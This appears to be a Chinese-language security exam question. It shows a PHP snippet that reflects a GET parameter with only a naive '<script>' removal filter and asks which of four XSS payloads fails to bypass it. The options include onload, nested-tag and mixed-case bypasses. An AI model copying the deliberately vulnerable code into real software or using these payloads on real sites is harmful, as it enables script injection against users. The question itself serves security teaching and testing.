已知一台服务器存在注入,源代码如下,下列选项中不可以绕过过滤并弹框的是( )
<?php
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
echo "<pre>Hello ${name}</pre>";
}
?> <body onload=alert(/xss/)>
<script>alert(/xss/)</script>
<sc<script>ript>alert(/xss/)</script>
<ScRipt>alert(/xss/)</script>